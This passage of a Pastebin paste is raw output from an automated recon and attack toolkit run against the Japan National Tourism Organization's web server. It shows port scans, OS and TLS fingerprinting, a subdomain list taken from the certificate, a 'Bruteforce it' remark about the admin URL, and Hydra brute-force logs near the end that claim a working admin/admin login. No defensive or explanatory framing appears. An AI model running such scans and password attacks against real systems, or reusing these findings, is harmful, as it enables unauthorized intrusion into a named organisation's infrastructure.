  777. [?] Enter the target: http://202.79.244.228
  778. [!] IP Address : 202.79.244.228
  779. [!] Server: Apache
  780. [-] Clickjacking protection is not in place.
  781. [!] 202.79.244.228 doesn't seem to use a CMS
  782. [+] Honeypot Probabilty: 0%
  783. ----------------------------------------
  784. [+] Robots.txt retrieved
  785. User-agent: bingbot
  786. Crawl-Delay: 5
  787.  
  788. User-agent: AhrefsBot
  789. Disallow: /
  790.  
  791. User-agent: BLEXBot
  792. Disallow: /
  793. ----------------------------------------
  794. PORT STATE SERVICE VERSION
  795. 21/tcp filtered ftp
  796. 22/tcp filtered ssh
  797. 23/tcp filtered telnet
  798. 25/tcp filtered smtp
  799. 80/tcp open http Apache httpd
  800. 110/tcp filtered pop3
  801. 143/tcp filtered imap
  802. 443/tcp open ssl/http Apache httpd
  803. 445/tcp filtered microsoft-ds
  804. 3389/tcp filtered ms-wbt-server
  805. ----------------------------------------
  806. Traceback (most recent call last):
  807.  
  808. Target: http://202.79.244.228
  809.  
  810. Server: Apache
  811.  
  812.  
  813. ## NOTE: The Administrator URL was renamed. Bruteforce it. ##
  814. ## None of /administrator, /admin, /manage ##
  815.  
  816.  
  817. ## Checking if the target has deployed an Anti-Scanner measure
  818.  
  819. [!] Scanning Passed ..... OK
  820.  
  821.  
  822. ## Detecting Joomla! based Firewall ...
  823.  
  824. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose
  825. [!] It contains some defensive mod_rewrite rules
  826. [!] Payloads that contain strings (mosConfig,base64_encode,<script>
  827. GLOBALS,_REQUEST) wil be responsed with 403.
  828.  
  829.  
  830. ## Fingerprinting in progress ...
  831.  
  832. ~Unable to detect the version. Is it sure a Joomla?
  833.  
  834. ## Fingerprinting done.
  835.  
  836.  
  837. ====================================================================================
  838. RUNNING NSLOOKUP
  839. ====================================================================================
  840. 228.244.79.202.in-addr.arpa name = bbt244-jnto-web01-228.jnto.go.jp.
  841.  
  842. Authoritative answers can be found from:
  843.  
  844. 228.244.79.202.in-addr.arpa domain name pointer bbt244-jnto-web01-228.jnto.go.jp.
  845. ====================================================================================
  846. CHECKING OS FINGERPRINT
  847. ====================================================================================
  848.  
  849. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  850.  
  851. [+] Target is 202.79.244.228
  852. [+] Loading modules.
  853. [+] Following modules are loaded:
  854. [x] [1] ping:icmp_ping - ICMP echo discovery module
  855. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  856. [x] [3] ping:udp_ping - UDP-based ping discovery module
  857. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  858. [x] [5] infogather:portscan - TCP and UDP PortScanner
  859. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  860. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  861. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  862. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  863. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  864. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  865. [x] [12] fingerprint:smb - SMB fingerprinting module
  866. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  867. [+] 13 modules registered
  868. [+] Initializing scan engine
  869. [+] Running scan engine
  870. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.79.244.228. Module test failed
  871. [-] ping:udp_ping module: no closed/open UDP ports known on 202.79.244.228. Module test failed
  872. [-] No distance calculation. 202.79.244.228 appears to be dead or no ports known
  873. [+] Host: 202.79.244.228 is down (Guess probability: 0%)
  874. [+] Cleaning up scan engine
  875. [+] Modules deinitialized
  876. [+] Execution completed.
  877.  
  878. ====================================================================================
  879. PINGING HOST
  880. ====================================================================================
  881. PING 202.79.244.228 (202.79.244.228) 56(84) bytes of data.
  882.  
  883. --- 202.79.244.228 ping statistics ---
  884. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  885.  
  886.  
  887. ====================================================================================
  888. RUNNING TCP PORT SCAN
  889. ====================================================================================
  890.  
  891. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:51 EST
  892. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  893. Host is up (0.21s latency).
  894. Not shown: 470 filtered ports, 1 closed port
  895. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  896. PORT STATE SERVICE
  897. 80/tcp open http
  898. 443/tcp open https
  899.  
  900. Nmap done: 1 IP address (1 host up) scanned in 6.32 seconds
  901.  
  902. ====================================================================================
  903. RUNNING INTRUSIVE SCANS
  904. ====================================================================================
  905. + -- --=[Port 21 closed... skipping.
  906. + -- --=[Port 22 closed... skipping.
  907. + -- --=[Port 23 closed... skipping.
  908. + -- --=[Port 25 closed... skipping.
  909. + -- --=[Port 53 closed... skipping.
  910. + -- --=[Port 79 closed... skipping.
  911. + -- --=[Port 80 opened... running tests...
  912. ====================================================================================
  913. CHECKING FOR WAF
  914. ====================================================================================
  915.  
  916. ^ ^
  917. _ __ _ ____ _ __ _ _ ____
  918. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  919. | V V // o // _/ | V V // 0 // 0 // _/
  920. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  921. <
  922. ...'
  923.  
  924. WAFW00F - Web Application Firewall Detection Tool
  925.  
  926. By Sandro Gauci && Wendel G. Henrique
  927.  
  928. Checking http://202.79.244.228
  929. Generic Detection results:
  930. No WAF detected by the generic detection
  931. Number of requests: 13
  932.  
  933. ====================================================================================
  934. GATHERING HTTP INFO
  935. ====================================================================================
  936. http://202.79.244.228 [200 OK] Apache, Country[JAPAN][JP], Google-Analytics[UA-761127-3], HTTPServer[Apache], IP[202.79.244.228], JQuery[1.11.0], Script[text/javascript], Title[Japan National Tourism Organization Web Site], X-UA-Compatible[IE=EmulateIE7]
  937.  
  938. __ ______ _____
  939. \ \/ / ___|_ _|
  940. \ /\___ \ | |
  941. / \ ___) || |
  942. /_/\_|____/ |_|
  943.  
  944. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  945. + -- --=[Target: 202.79.244.228:80
  946. + -- --=[Site not vulnerable to Cross-Site Tracing!
  947. + -- --=[Site not vulnerable to Host Header Injection!
  948. + -- --=[Site vulnerable to Cross-Frame Scripting!
  949. + -- --=[Site vulnerable to Clickjacking!
  950.  
  951. HTTP/1.1 400 Bad Request
  952. Date: Mon, 08 Jan 2018 15:51:59 GMT
  953. Server: Apache
  954. Content-Length: 226
  955. Connection: close
  956. Content-Type: text/html; charset=iso-8859-1
  957.  
  958. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  959. <html><head>
  960. <title>400 Bad Request</title>
  961. </head><body>
  962. <h1>Bad Request</h1>
  963. <p>Your browser sent a request that this server could not understand.<br />
  964. </p>
  965. </body></html>
  966.  
  967. HTTP/1.1 400 Bad Request
  968. Date: Mon, 08 Jan 2018 15:52:00 GMT
  969. Server: Apache
  970. Content-Length: 226
  971. Connection: close
  972. Content-Type: text/html; charset=iso-8859-1
  973.  
  974. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  975. <html><head>
  976. <title>400 Bad Request</title>
  977. </head><body>
  978. <h1>Bad Request</h1>
  979. <p>Your browser sent a request that this server could not understand.<br />
  980. </p>
  981. </body></html>
  982.  
  983.  
  984.  
  985.  
  986. ====================================================================================
  987. CHECKING HTTP HEADERS
  988. ====================================================================================
  989. + -- --=[Checking if X-Content options are enabled on 202.79.244.228...
  990.  
  991. + -- --=[Checking if X-Frame options are enabled on 202.79.244.228...
  992.  
  993. + -- --=[Checking if X-XSS-Protection header is enabled on 202.79.244.228...
  994.  
  995. + -- --=[Checking HTTP methods on 202.79.244.228...
  996. Allow: HEAD,HEAD,GET,HEAD,POST,OPTIONS
  997.  
  998. + -- --=[Checking if TRACE method is enabled on 202.79.244.228...
  999.  
  1000. + -- --=[Checking for META tags on 202.79.244.228...
  1001. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  1002. <meta http-equiv="content-style-type" content="text/css" />
  1003. <meta http-equiv="content-script-type" content="text/javascript" />
  1004. <meta http-equiv="imagetoolbar" content="no" />
  1005. <meta name="MSSmartTagsPreventParsing" content="true" />
  1006. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
  1007. <meta name="description" content="JNTO is involved in a broad range of activities promoting travel to Japan through various activities overseas as well as tourism-promoting activities in Japan." />
  1008. <meta name="keywords" content="Japan National Tourism Organization, Japan Travel" />
  1009.  
  1010. + -- --=[Checking for open proxy on 202.79.244.228...
  1011. </div>
  1012. <!--/contents-->
  1013. <!--==========CONTENTS end==========-->
  1014. </div>
  1015. <!--/wrapperinner-->
  1016. </div>
  1017. <!--/wrapper-->
  1018.  
  1019. </body>
  1020. </html>
  1021.  
  1022. + -- --=[Enumerating software on 202.79.244.228...
  1023. Server: Apache
  1024.  
  1025. + -- --=[Checking if Strict-Transport-Security is enabled on 202.79.244.228...
  1026.  
  1027. + -- --=[Checking for Flash cross-domain policy on 202.79.244.228...
  1028. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1029. <html><head>
  1030. <title>404 Not Found</title>
  1031. </head><body>
  1032. <h1>Not Found</h1>
  1033. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1034. </body></html>
  1035.  
  1036. + -- --=[Checking for Silverlight cross-domain policy on 202.79.244.228...
  1037. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1038. <html><head>
  1039. <title>404 Not Found</title>
  1040. </head><body>
  1041. <h1>Not Found</h1>
  1042. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1043. </body></html>
  1044.  
  1045. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.79.244.228...
  1046.  
  1047. + -- --=[Retrieving robots.txt on 202.79.244.228...
  1048. User-agent: bingbot
  1049. Crawl-Delay: 5
  1050.  
  1051. User-agent: AhrefsBot
  1052. Disallow: /
  1053.  
  1054. User-agent: BLEXBot
  1055. Disallow: /
  1056. + -- --=[Retrieving sitemap.xml on 202.79.244.228...
  1057. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1058. <html><head>
  1059. <title>404 Not Found</title>
  1060. </head><body>
  1061. <h1>Not Found</h1>
  1062. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1063. </body></html>
  1064.  
  1065. + -- --=[Checking cookie attributes on 202.79.244.228...
  1066.  
  1067. + -- --=[Checking for ASP.NET Detailed Errors on 202.79.244.228...
  1068.  
  1069.  
  1070. ====================================================================================
  1071. SAVING SCREENSHOTS
  1072. ====================================================================================
  1073. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/202.79.244.228-port80.jpg
  1074. libpng warning: iCCP: known incorrect sRGB profile
  1075. libpng warning: iCCP: known incorrect sRGB profile
  1076. + -- --=[Port 110 closed... skipping.
  1077. + -- --=[Port 111 closed... skipping.
  1078. + -- --=[Port 135 closed... skipping.
  1079. + -- --=[Port 139 closed... skipping.
  1080. + -- --=[Port 161 closed... skipping.
  1081. + -- --=[Port 162 closed... skipping.
  1082. + -- --=[Port 389 closed... skipping.
  1083. + -- --=[Port 443 opened... running tests...
  1084. ====================================================================================
  1085. CHECKING FOR WAF
  1086. ====================================================================================
  1087.  
  1088. ^ ^
  1089. _ __ _ ____ _ __ _ _ ____
  1090. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1091. | V V // o // _/ | V V // 0 // 0 // _/
  1092. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1093. <
  1094. ...'
  1095.  
  1096. WAFW00F - Web Application Firewall Detection Tool
  1097.  
  1098. By Sandro Gauci && Wendel G. Henrique
  1099.  
  1100. Checking https://202.79.244.228
  1101. Traceback (most recent call last):
  1102. File "/usr/bin/wafw00f", line 8, in <module>
  1103. main()
  1104. File "/usr/lib/python2.7/dist-packages/wafw00f/__init__.py", line 808, in main
  1105. if attacker.normalrequest() is None:
  1106. File "/usr/lib/python2.7/dist-packages/wafw00f/__init__.py", line 96, in normalrequest
  1107. return self.request(usecache=usecache, cacheresponse=cacheresponse, headers=headers)
  1108. File "/usr/lib/python2.7/dist-packages/wafw00f/lib/evillib.py", line 323, in request
  1109. h.request(method, path, headers=headers)
  1110. File "/usr/lib/python2.7/httplib.py", line 1042, in request
  1111. self._send_request(method, url, body, headers)
  1112. File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
  1113. self.endheaders(body)
  1114. File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
  1115. self._send_output(message_body)
  1116. File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
  1117. self.send(msg)
  1118. File "/usr/lib/python2.7/httplib.py", line 844, in send
  1119. self.connect()
  1120. File "/usr/lib/python2.7/httplib.py", line 1263, in connect
  1121. server_hostname=server_hostname)
  1122. File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
  1123. _context=self)
  1124. File "/usr/lib/python2.7/ssl.py", line 617, in __init__
  1125. self.do_handshake()
  1126. File "/usr/lib/python2.7/ssl.py", line 854, in do_handshake
  1127. match_hostname(self.getpeercert(), self.server_hostname)
  1128. File "/usr/lib/python2.7/ssl.py", line 288, in match_hostname
  1129. % (hostname, ', '.join(map(repr, dnsnames))))
  1130. ssl.CertificateError: hostname '202.79.244.228' doesn't match either of 'action.jnto.go.jp', 'cms-eng.jnto.go.jp', 'fileserver.jnto.go.jp', 'japan-magazine.jnto.go.jp', 'japan-photo.jnto.go.jp', 'japan-tours.jnto.go.jp', 'japanfreewifi.jnto.go.jp', 'jnto-cms01.jnto.go.jp', 'magazine.jnto.go.jp', 'mice.jnto.go.jp', 'recruit.jnto.go.jp', 'shorttrips.jnto.go.jp', 'tax-freeshop.jnto.go.jp', 'tic.jnto.go.jp', 'visit-japan.jp', 'weblog-analytics.jnto.go.jp', 'welcome2japan.hk', 'www.camnhannhatban.vn', 'www.japanmeetings.org', 'www.jnto.go.jp', 'www.welcome2japan.hk'
  1131.  
  1132. ====================================================================================
  1133. GATHERING HTTP INFO
  1134. ====================================================================================
  1135. https://202.79.244.228 [200 OK] Apache, Country[JAPAN][JP], Google-Analytics[UA-761127-3], HTTPServer[Apache], IP[202.79.244.228], JQuery[1.11.0], Script[text/javascript], Title[Japan National Tourism Organization Web Site], X-UA-Compatible[IE=EmulateIE7]
  1136.  
  1137. ====================================================================================
  1138. GATHERING SSL/TLS INFO
  1139. ====================================================================================
  1140.  
  1141.  
  1142.  
  1143. AVAILABLE PLUGINS
  1144. -----------------
  1145.  
  1146. PluginHSTS
  1147. PluginOpenSSLCipherSuites
  1148. PluginCertInfo
  1149. PluginSessionRenegotiation
  1150. PluginCompression
  1151. PluginChromeSha1Deprecation
  1152. PluginSessionResumption
  1153. PluginHeartbleed
  1154.  
  1155.  
  1156.  
  1157. CHECKING HOST(S) AVAILABILITY
  1158. -----------------------------
  1159.  
  1160. 202.79.244.228:443 => 202.79.244.228:443
  1161.  
  1162.  
  1163.  
  1164. SCAN RESULTS FOR 202.79.244.228:443 - 202.79.244.228:443
  1165. --------------------------------------------------------
  1166.  
  1167. * Deflate Compression:
  1168. OK - Compression disabled
  1169.  
  1170. * Session Renegotiation:
  1171. Client-initiated Renegotiations: OK - Rejected
  1172. Secure Renegotiation: OK - Supported
  1173.  
  1174. * Certificate - Content:
  1175. SHA1 Fingerprint: 7dd7d4791b10d074943f91787c53e9cce000f94f
  1176. Common Name: None
  1177. Issuer: COMODO RSA Domain Validation Secure Server CA
  1178. Serial Number: 99CF75306B58D457D0A07E7C9E04BAE2
  1179. Not Before: Sep 6 00:00:00 2017 GMT
  1180. Not After: Mar 14 23:59:59 2018 GMT
  1181. Signature Algorithm: sha256WithRSAEncryption
  1182. Public Key Algorithm: rsaEncryption
  1183. Key Size: 2048 bit
  1184. Exponent: 65537 (0x10001)
  1185. X509v3 Subject Alternative Name: {'DNS': ['action.jnto.go.jp', 'cms-eng.jnto.go.jp', 'fileserver.jnto.go.jp', 'japan-magazine.jnto.go.jp', 'japan-photo.jnto.go.jp', 'japan-tours.jnto.go.jp', 'japanfreewifi.jnto.go.jp', 'jnto-cms01.jnto.go.jp', 'magazine.jnto.go.jp', 'mice.jnto.go.jp', 'recruit.jnto.go.jp', 'shorttrips.jnto.go.jp', 'tax-freeshop.jnto.go.jp', 'tic.jnto.go.jp', 'visit-japan.jp', 'weblog-analytics.jnto.go.jp', 'welcome2japan.hk', 'www.camnhannhatban.vn', 'www.japanmeetings.org', 'www.jnto.go.jp', 'www.welcome2japan.hk']}
  1186.  
  1187. * Certificate - Trust:
  1188. Hostname Validation: FAILED - Certificate does NOT match 202.79.244.228
  1189. Google CA Store (09/2015): OK - Certificate is trusted
  1190. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1191. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1192. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1193. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1194. Certificate Chain Received: ['PositiveSSL Multi-Domain', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  1195.  
  1196. * Certificate - OCSP Stapling:
  1197. NOT SUPPORTED - Server did not send back an OCSP response.
  1198.  
  1199. * Session Resumption:
  1200. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1201. With TLS Session Tickets: OK - Supported
  1202.  
  1203. * SSLV2 Cipher Suites:
  1204. Server rejected all cipher suites.
  1205.  
  1206. * SSLV3 Cipher Suites:
  1207. Server rejected all cipher suites.
  1208.  
  1209.  
  1210.  
  1211. SCAN COMPLETED IN 4.13 S
  1212. ------------------------
  1213. Version: 1.11.10-static
  1214. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1215.  
  1216. Testing SSL server 202.79.244.228 on port 443 using SNI name 202.79.244.228
  1217.  
  1218. TLS Fallback SCSV:
  1219. Server supports TLS Fallback SCSV
  1220.  
  1221. TLS renegotiation:
  1222. Secure session renegotiation supported
  1223.  
  1224. TLS Compression:
  1225. Compression disabled
  1226.  
  1227. Heartbleed:
  1228. TLS 1.2 not vulnerable to heartbleed
  1229. TLS 1.1 not vulnerable to heartbleed
  1230. TLS 1.0 not vulnerable to heartbleed
  1231.  
  1232. Supported Server Cipher(s):
  1233. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1234. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1235. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1236. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1237. Accepted TLSv1.2 256 bits AES256-SHA256
  1238. Accepted TLSv1.2 256 bits AES256-SHA
  1239. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1240. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1241. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1242. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1243. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1244. Accepted TLSv1.2 128 bits AES128-SHA256
  1245. Accepted TLSv1.2 128 bits AES128-SHA
  1246. Accepted TLSv1.2 128 bits SEED-SHA
  1247. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1248. Accepted TLSv1.2 128 bits IDEA-CBC-SHA
  1249. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1250. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  1251. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1252. Accepted TLSv1.1 256 bits AES256-SHA
  1253. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1254. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1255. Accepted TLSv1.1 128 bits AES128-SHA
  1256. Accepted TLSv1.1 128 bits SEED-SHA
  1257. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1258. Accepted TLSv1.1 128 bits IDEA-CBC-SHA
  1259. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1260. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  1261. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1262. Accepted TLSv1.0 256 bits AES256-SHA
  1263. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1264. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1265. Accepted TLSv1.0 128 bits AES128-SHA
  1266. Accepted TLSv1.0 128 bits SEED-SHA
  1267. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1268. Accepted TLSv1.0 128 bits IDEA-CBC-SHA
  1269. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1270. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  1271.  
  1272. SSL Certificate:
  1273. Signature Algorithm: sha256WithRSAEncryption
  1274. RSA Key Strength: 2048
  1275.  
  1276. Subject: /OU=Domain Control Validated/OU=Hosted by Comodo Japan Inc/OU=PositiveSSL Multi-Domain
  1277. Altnames: DNS:action.jnto.go.jp, DNS:cms-eng.jnto.go.jp, DNS:fileserver.jnto.go.jp, DNS:japan-magazine.jnto.go.jp, DNS:japan-photo.jnto.go.jp, DNS:japan-tours.jnto.go.jp, DNS:japanfreewifi.jnto.go.jp, DNS:jnto-cms01.jnto.go.jp, DNS:magazine.jnto.go.jp, DNS:mice.jnto.go.jp, DNS:recruit.jnto.go.jp, DNS:shorttrips.jnto.go.jp, DNS:tax-freeshop.jnto.go.jp, DNS:tic.jnto.go.jp, DNS:visit-japan.jp, DNS:weblog-analytics.jnto.go.jp, DNS:welcome2japan.hk, DNS:www.camnhannhatban.vn, DNS:www.japanmeetings.org, DNS:www.jnto.go.jp, DNS:www.welcome2japan.hk
  1278. Issuer: COMODO RSA Domain Validation Secure Server CA
  1279.  
  1280. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
  1281. + -- --=[Checking for DROWN (SSLv2): 202.79.244.228:443
  1282. + -- --=[Checking for HeartBleed: 202.79.244.228:443
  1283. + -- --=[Checking for OpenSSL CCS: 202.79.244.228:443
  1284. + -- --=[Checking for Poodle (SSLv3): 202.79.244.228:443
  1285. + -- --=[Checking for WinShock (MS14-066): 202.79.244.228:443
  1286. Testing if OpenSSL supports the ciphers we are checking for: YES
  1287.  
  1288. Testing 202.79.244.228:443 for availability of SSL ciphers added in MS14-066...
  1289. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
  1290. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
  1291. Testing cipher AES256-GCM-SHA384: SUPPORTED
  1292. Testing cipher AES128-GCM-SHA256: SUPPORTED
  1293. Testing if IIS is running on port 443: NO
  1294. Checking if target system is running Windows Server 2012 or later...
  1295. Testing cipher ECDHE-RSA-AES256-SHA384: SUPPORTED
  1296. 202.79.244.228:443 is patched: UNKNOWN: Windows Server 2012 or later detected.
  1297. + -- --=[Scan Complete!
  1298. ====================================================================================
  1299. CHECKING HTTP HEADERS
  1300. ====================================================================================
  1301. + -- --=[Checking if X-Content options are enabled on 202.79.244.228...
  1302.  
  1303. + -- --=[Checking if X-Frame options are enabled on 202.79.244.228...
  1304.  
  1305. + -- --=[Checking if X-XSS-Protection header is enabled on 202.79.244.228...
  1306.  
  1307. + -- --=[Checking HTTP methods on 202.79.244.228...
  1308. Allow: HEAD,HEAD,GET,HEAD,POST,OPTIONS
  1309.  
  1310. + -- --=[Checking if TRACE method is enabled on 202.79.244.228...
  1311.  
  1312. + -- --=[Checking for META tags on 202.79.244.228...
  1313. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  1314. <meta http-equiv="content-style-type" content="text/css" />
  1315. <meta http-equiv="content-script-type" content="text/javascript" />
  1316. <meta http-equiv="imagetoolbar" content="no" />
  1317. <meta name="MSSmartTagsPreventParsing" content="true" />
  1318. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
  1319. <meta name="description" content="JNTO is involved in a broad range of activities promoting travel to Japan through various activities overseas as well as tourism-promoting activities in Japan." />
  1320. <meta name="keywords" content="Japan National Tourism Organization, Japan Travel" />
  1321.  
  1322. + -- --=[Checking for open proxy on 202.79.244.228...
  1323.  
  1324. + -- --=[Enumerating software on 202.79.244.228...
  1325. Server: Apache
  1326.  
  1327. + -- --=[Checking if Strict-Transport-Security is enabled on 202.79.244.228...
  1328.  
  1329. + -- --=[Checking for Flash cross-domain policy on 202.79.244.228...
  1330. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1331. <html><head>
  1332. <title>404 Not Found</title>
  1333. </head><body>
  1334. <h1>Not Found</h1>
  1335. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1336. </body></html>
  1337.  
  1338. + -- --=[Checking for Silverlight cross-domain policy on 202.79.244.228...
  1339. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1340. <html><head>
  1341. <title>404 Not Found</title>
  1342. </head><body>
  1343. <h1>Not Found</h1>
  1344. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1345. </body></html>
  1346.  
  1347. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.79.244.228...
  1348.  
  1349. + -- --=[Retrieving robots.txt on 202.79.244.228...
  1350. User-agent: bingbot
  1351. Crawl-Delay: 5
  1352.  
  1353. User-agent: AhrefsBot
  1354. Disallow: /
  1355.  
  1356. User-agent: BLEXBot
  1357. Disallow: /
  1358. + -- --=[Retrieving sitemap.xml on 202.79.244.228...
  1359. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1360. <html><head>
  1361. <title>404 Not Found</title>
  1362. </head><body>
  1363. <h1>Not Found</h1>
  1364. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1365. </body></html>
  1366.  
  1367. + -- --=[Checking cookie attributes on 202.79.244.228...
  1368.  
  1369. + -- --=[Checking for ASP.NET Detailed Errors on 202.79.244.228...
  1370.  
  1371. __________ __ ____ ___
  1372. \______ \_______ __ ___/ |_ ____ \ \/ /
  1373. | | _/\_ __ \ | \ __\/ __ \ \ /
  1374. | | \ | | \/ | /| | \ ___/ / \
  1375. |______ / |__| |____/ |__| \___ >___/\ \
  1376. \/ \/ \_/
  1377.  
  1378. + -- --=[BruteX v1.7 by 1N3
  1379. + -- --=[http://crowdshield.com
  1380.  
  1381.  
  1382. ################################### Running Port Scan ##############################
  1383.  
  1384. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:55 EST
  1385. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  1386. Host is up (0.21s latency).
  1387. Not shown: 24 filtered ports
  1388. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1389. PORT STATE SERVICE
  1390. 80/tcp open http
  1391. 443/tcp open https
  1392.  
  1393. Nmap done: 1 IP address (1 host up) scanned in 4.55 seconds
  1394.  
  1395. ################################### Running Brute Force ############################
  1396.  
  1397. + -- --=[Port 21 closed... skipping.
  1398. + -- --=[Port 22 closed... skipping.
  1399. + -- --=[Port 23 closed... skipping.
  1400. + -- --=[Port 25 closed... skipping.
  1401. + -- --=[Port 80 opened... running tests...
  1402. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1403.  
  1404. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 10:55:13
  1405. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  1406. [DATA] attacking http-get://202.79.244.228:80//
  1407. [80][http-get] host: 202.79.244.228 login: admin password: admin
  1408. [STATUS] attack finished for 202.79.244.228 (valid pair found)
  1409. 1 of 1 target successfully completed, 1 valid password found
  1410. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 10:55:15
  1411. + -- --=[Port 110 closed... skipping.
  1412. + -- --=[Port 139 closed... skipping.
  1413. + -- --=[Port 162 closed... skipping.
  1414. + -- --=[Port 389 closed... skipping.
  1415. + -- --=[Port 443 opened... running tests...
  1416. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1417.  
  1418. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 10:55:15
  1419. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  1420. [DATA] attacking http-gets://202.79.244.228:443//
  1421. [443][http-get] host: 202.79.244.228 login: admin password: admin
  1422. [STATUS] attack finished for 202.79.244.228 (valid pair found)
  1423. 1 of 1 target successfully completed, 1 valid password found
  1424. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 10:55:17
  1425. #######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!